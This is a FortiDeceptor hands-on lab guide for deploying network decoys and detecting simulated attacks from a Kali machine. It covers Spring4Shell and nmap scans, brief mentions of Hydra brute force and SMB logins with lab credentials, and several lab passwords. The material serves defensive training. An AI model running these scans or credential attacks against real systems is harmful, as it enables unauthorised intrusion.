Connect to Kali Linux using the SSH shell and run following commands:
@kali:~$ cd Downloads/spring4shell-scan
Note: If this directory does not exist, run following commands first:
@kali:~$ cd ~/Downloads
@kali:~$ git clone https://github.com/fullhunt/spring4shell-scan.git
@kali:~$ cd ~/Downloads/spring4shell-scan
Launch vulnerability scan from Kali:

1. Make sure you are in the right folder “spring4shell-scan” by running the command pwd :
2. Use python to start the script, targeting the outbreak decoy on FortiDeceptor:
@kali (/Downloads/spring4shell-scan)$ spring4shell-scan.py -u https://192.168.2.17

Note that the scan tool will find no vulnerability. This is on purpose as FDC does not mimic a full OS. For Outbreak
Alerts FDC does check the URL requests if they match the vulnerability and report it back to the incident analysis.
3. Check the Incident > Analysis on FortiDeceptor that the scan was identified and correctly reported.

12. Fabric Integration
FortiDeceptor's ability to create a fabricated network of decoys across both IT and OT segments enables the detection of
external and internal threat actors across a broad surface.
By integrating analytics, driven by AI-based detection, FortiDeceptor provides an unambiguous early warning of an
impending threat campaign. Through Security Fabric integration, FortiDeceptor automatically triggers a policy action with
inline security controls, so containment of the threat is undertaken as part of the threat response.
This exercise will simulate a threat actor detection and mitigation automation by using the integration between the
FortiDeceptor and the FortiGate.
Let's configure the integration on the FortiDeceptor side:
1. Go to Fabric > Quarantine Integration
2. Configure the following parameters under
Name fgtblocker
Block Severity Check all (Low, Medium, High, Critical)
Integrate Method: FGT-REST-API
IP: 192.168.0.2
Port: 443
Password: FortiDeceptor12#
3. Press Save and verify that the Enabled and Ready Status shows a positive connection to FGT
3. To trigger a mitigation action, we need to simulate an attack against one of the Decoys. Please access the KALI BOX
over SSH check that you can reach the internet by pinging Google DNS Servers.
@kali:~$ ping 8.8.8.8
5. Now we use NMAP to run a port scan to trigger the quarantine action for the KALI BOX
@kali:~$ sudo nmap -F -sV 192.168.2.17

6. After the scan has finished check on the FortiDeceptor > Fabric > Quarantine Status that the KALI BOX has been set
in Quarantine.
7. This status is synced via the Fabric Upstream to FortiGate which will block now Internet connection for that host. Verify
that by pinging Google DNS again and it should no reply. Keep the ping running.
8. Go back to the FortiDeceptor > Fabric > Quarantine Status, select the quarantine host and click the Unblock button
to release the host from Quarantine.
9. This status will be synced to FortiGate and the running ping on the KALI BOX should now start to reply.

13. Decoy Deployment
13.1 Windows Decoy Deployment
To deploy the Windows Decoy VM in the deployment network:
a. From the FortiDeceptor web console, go to Deception > Deployment Wizard.
b. Under Please select a template to start with: click the add (+) icon.

c. Configure the following settings:
Name Win10
Available Deception OSes win10v1
Selected Services Keep as is

Click Generate Lures to generate the
Automate Lures
lures automatically using the any tag.
RDP Leave Enabled
SMB Leave Enabled
TCPlistener Disable
NBNSSpoofSpotter Disable
ICMP Disable
FTP Disable
Launch Immediately Enable

Disabled
Reset Decoy (In production, this feature reset the Decoy after attacker
engagement based on specified time.)

d. Click Next to advance to the Set Network section in the decoy deployment wizard, and configure the Decoy
networking settings:
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.
e. Click + Add Network for deployment to add the Decoy IP address, and configure the following settings:

Deploy Network port2: subnet 192.168.2.100/24

Choose if the Decoy will get Static IP or DHCP.
Addressing Mode
In this environment we use STATIC configuration only.
Network Mask Keep as 255.255.255.0
Enter the deployment network default gateway
Gateway
(192.168.2.1)
Leave empty. FortiDeceptor will choose automatically a
MAC Address OUI
MAC address
Number of IP addresses to
IP Count assign to Decoys. Configure as
1 for this exercise.
Min Keep as is
Max Keep as is
Enter the IP address range that FortiDeceptor can
IP Ranges configure the Decoy IPaddresses.
For this example, configure as follows: 192.168.2.11
Decoy Interface Configuration examples:
Configuration for 1 Decoy IP Address

f. Click Done to close the popup window.
g. Click Deploy to deploy the Decoy.
h. You should be auto redirected, from the FortiDeceptor web console, go to Deception > Decoy Status. You
should see the Decoy you configured with the status of initializing.
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.

Use the Actions menu to:
• View the Decoy VM Configuration
• Copy the configuration to a template
• Stop the Decoy VM
• Delete the Decoy VM

13.2 Linux Decoy Deployment
To deploy the Linux Decoy VM in the deployment network:
a. From the FortiDeceptor web console, go to Deception > Deployment Wizard.
b. Under Please select a template to start with: click the add (+) icon.

c. Configure the following settings:
Name Linux-Decoy
Available Deception OSes ubuntu16v1
Selected Services Keep as is
Click Generate Lures to

Automate Lures generate the lures automatically
using the any tag.
(Optional) Add custom TCP port to the Decoy e.g.
TCPlistener (0) 555.
If no port is noted, then disable the TCPListener.
HTTP Enable
HTTPS Disable
GIT Disable
ICMP Enable
FTP Disable
Launch Immediately Enable
Disabled
Reset Decoy (In production, this feature reset the Decoy after
attacker engagement based on specified time.)

d. Click Next to advance to the Set Network section in the decoy deployment wizard, and configure the Decoy
networking settings:
The first DNS server (Google 8.8.8.8) and the hostname are pre-configured.

Deploy Network Choose the deployment network interface

Choose if the Decoy will get Static IP or DHCP.
Addressing Mode
In this environment we use STATIC configuration only.
Network Mask Keep as 255.255.255.0
Enter the deployment network default gateway
Gateway
(192.168.2.1)
Leave empty. FortiDeceptor will choose automatically a
MAC Address OUI
MAC address
Number of IP addresses to
IP Count assign to Decoys. Configure as
1 for this exercise.
Min Keep as is
Max Keep as is
Enter the IP address range that FortiDeceptor can
configure the Decoy IPaddresses.
IP Ranges
For this example, configure as follows: 192.168.2.10-
192.168.2.20 Decoy Interface Configuration examples:
Configuration for 11 Decoy IP Addresses (range)

f. Click Done to close the popup window.
g. Click Deploy to deploy the Decoy.
h. You should be auto redirected, from the FortiDeceptor web console, go to Deception > Decoy Status. You
should see the Decoy you configured with the status of initializing.
Note: Refresh the screen and wait for the status to change to Running. It can take around 5 minutes for the status to change
to Running. If the status changes to Fail, check your configuration and redeploy the Decoy. Once the status changes to
Running, the Action field is populated with additional icons.

Use the Actions menu to:
• View the Decoy VM Configuration
• Copy the configuration to a template
• Stop the Decoy VM
• Delete the Decoy VM
• Attack Test: To make sure the Decoy is accessible

13.3 Siemens-S7-200 PLC Decoy Deployment
Follow the Deployment Wizard Steps as described in the previous examples (13.1 and 13.2) while applying the following
settings:
• Name: Siemens-S7-200
• Deception OS : scadav3
• IP: 192.168.2.12
• On HTTP and S7COMM service: set the decoy parameters as the values listed in the figure.

13.4 HP Printer IoT Decoy Deployment
Follow the Deployment Wizard Steps as described in the previous examples while implementing the following settings:
• Name: HP-Printer
• Deception OS : iotv1
• IP: 192.168.2.13
• SNMP Community: “FDCCommunity”
• Jetdirect: Enable
• Printer-WEB: Enable

13.5 Cisco Router 2691 IoT Decoy Deployment
• Name: CiscoIOS
• Deception OS : iotv1
• IP: 192.168.2.14
• Select Model: 2961
• SNMP Community: “FDCComminity”
• For the Cisco router we will need to use a real Cisco IOS for the decoy simulation. Please download a Cisco IOS sample
from the link below:
• https://fortinet.egnyte.com/dl/wn22uc1Ko4
• Password: QaRqm35R
• Download cisco ios.zip
• Please unzip cisco ios.zip & upload the .bin file independently – select any of the 3 images
• Zip file doesn’t contain sample-config configuration file as it is not needed for this lab, but if a customer has one, it can be loaded
when creating a decoy
Note: This is an exclusive Fortinet router image, in real deployments, customers need to upload their own images.

13.5 Cisco Router 2691 IoT Decoy Deployment
This is a sample config for the Router Decoy.

13.6 Tomcat Decoy Deployment
• Name: Tomcat-Decoy
• Deception OS : ubuntu18v1
• IP: 192.168.2.15
• Tomcat HTTP: Enabled (port 8080)
• TOMCAT HTTPS: Enabled (port 8443)

13.7 SQL Decoy Deployment
• Name: SQL-Decoy
• Deception OS : ubuntu18v1
• IP: 192.168.2.16
• MariaDB: Enabled
• Listening Port: 3306
• Database Name: CustomerDB
• Generate lures
Click on Sample to download the Sample SQL schema

13.8 Spring4Shell Outbreak Decoy Deployment
• Name: Spring4Shell
• Deception OS : outbreakv1
• Available Deception Decoys: spring4shell_decoy
• IP: 192.168.2.17
• SPRING4SHELL ALERT: enable

13.9 SIP Decoy Deployment
• Name: SIP-Decoy
• Deception OSs : voipv1
• Available Deception Decoys: SIP Decoy
• IP: 192.168.2.18
• Generate Lures
• SIP: Enabled
• Use Default TCP/UDP ports

14. Cleanup
12. Cleanup
After you finished all labs, please complete the following 2 steps:
1. Reset FortiDeceptor back to default settings
2. Uninstall Token package from Windows Machine
FortiDeceptor
• Delete the Quarantine Integration and press Apply.
• Login via CLI, using the same credentials as for the UI login and perform a data purge. After performing the
command, type ‘y’, the FortiDeceptor unit will clean all data and do a reboot.
data-purge –a

12. Cleanup
Windows Device
• Rdp to 192.168.2.200
• Go to Download and find the extracted Token Package and under windows folder execute uninstall.bat
• Once the files are removed from the Downloads folder, delete zip file.

END – OF – LABS
Thank you for participating in this Hands-On-Lab.
You may log-off the lab environment now.

FortiDeceptor-4.3.0-Threat Prevention and Detection With FortiDeceptor

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

FortiDeceptor-4.3.0-Threat Prevention and Detection With FortiDeceptor

Uploaded by

Copyright:

Available Formats

Threat Prevention and Detection

© Fortinet Inc. All Rights Reserved. 3

• FortiDeceptor & FortiSOAR – protecting the OT network

© Fortinet Inc. All Rights Reserved. 5

© Fortinet Inc. All Rights Reserved. 6

© Fortinet Inc. All Rights Reserved. 8

Platform IP Address User credentials

© Fortinet Inc. All Rights Reserved. 9

© Fortinet Inc. All Rights Reserved. 11

The current FortiDeceptor IP address capacity:

© Fortinet Inc. All Rights Reserved. 14

3 Admin Tasks Prepare lab environment. 15 minutes

8 Network Attacks: SCADA Decoy (MODBUS)

FortiDeceptor Administrator tasks:

1. Access the FortiDeceptor web management console via SSL–VPN

2. Verify the FortiDeceptor has a valid license under the dashboard

On a brand-new deployment, you are required to register the

3. Its ok if „FDN Download Server“ and „Web Filtering Server“ are

© Fortinet Inc. All Rights Reserved. 21

Find Running Services

© Fortinet Inc. All Rights Reserved. 23

© Fortinet Inc. All Rights Reserved. 24

The attacker will use Hydra, which is a brute force password

From the Kali terminal window, run the following command:

© Fortinet Inc. All Rights Reserved. 26

© Fortinet Inc. All Rights Reserved. 27

© Fortinet Inc. All Rights Reserved. 28

© Fortinet Inc. All Rights Reserved. 29

Campaign Name WIN

© Fortinet Inc. All Rights Reserved. 30

© Fortinet Inc. All Rights Reserved. 31

© Fortinet Inc. All Rights Reserved. 32

Exercise: Collect information from an infected

4. Now we have the needed privileges to run the next commands.

• Perform SMB login using previously obtained credentials (matthew//iloveyou)

© Fortinet Inc. All Rights Reserved. 37

© Fortinet Inc. All Rights Reserved. 39

To deploy a Deception Lure on an infected endpoint:

© Fortinet Inc. All Rights Reserved. 40

Campaign Name HoneyDocs

Lure Types Check HoneyDoc for the Linux Decoy

Default at Recent folders, you may specify path you

5. Unzip the file.

Note: During HoneyDocs Token package installation, an existing token

© Fortinet Inc. All Rights Reserved. 42

© Fortinet Inc. All Rights Reserved. 43

© Fortinet Inc. All Rights Reserved. 44

SSH Access to Linux-Decoy

4. Open a browser and access the website https://wfurltest.fortiguard.com .

© Fortinet Inc. All Rights Reserved. 46

Probing the SQL Decoy

© Fortinet Inc. All Rights Reserved. 48

© Fortinet Inc. All Rights Reserved. 49

© Fortinet Inc. All Rights Reserved. 51

© Fortinet Inc. All Rights Reserved. 52

Probing the Tomcat Decoy

© Fortinet Inc. All Rights Reserved. 54

© Fortinet Inc. All Rights Reserved. 55

© Fortinet Inc. All Rights Reserved. 57

© Fortinet Inc. All Rights Reserved. 58

On FortiDeceptor, under Incident Analysis, find the Interaction incident

© Fortinet Inc. All Rights Reserved. 59